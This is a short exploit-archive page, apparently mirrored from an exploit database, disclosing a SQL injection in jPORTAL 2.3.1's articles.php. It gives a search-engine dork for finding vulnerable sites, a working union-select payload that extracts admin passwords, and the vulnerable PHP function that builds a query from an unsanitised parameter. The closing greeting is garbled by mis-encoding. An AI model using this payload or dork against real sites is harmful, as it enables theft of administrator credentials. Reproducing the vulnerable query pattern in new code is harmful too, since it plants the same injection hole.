jPORTAL <= 2.3.1 articles.php Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : jPORTAL <= 2.3.1 articles.php Remote SQL Injection Vulnerability
# Published : 2007-11-09
# Author : Alexsize
# Previous Title : Softbiz Link Directory Script Remote SQL Injection Vulnerability
# Next Title : jPORTAL 2 mailer.php Remote SQL Injection Vulnerability

Title:jPORTAL =< 2.3.1 and  Remote SQL Injection Vulnerability
Dork:  intext:"jPORTAL 2" & inurl:"articles.php?topic="

Autor:  Alexsize
E-Mail: Alexsize@mail.ru
Site:   Antichat.ru


articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/

Vuln code:

function topic_name($a)  
{     
global $topic_tbl; 
$query = "SELECT * FROM $topic_tbl WHERE id=$a"; 
$result = mysql_query($query);   
$r = mysql_fetch_array($result);     
return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';   
} 

C ??D2D°D?DμD?D?DμD?, Alexsize.

# www.Syue.com [2007-11-09]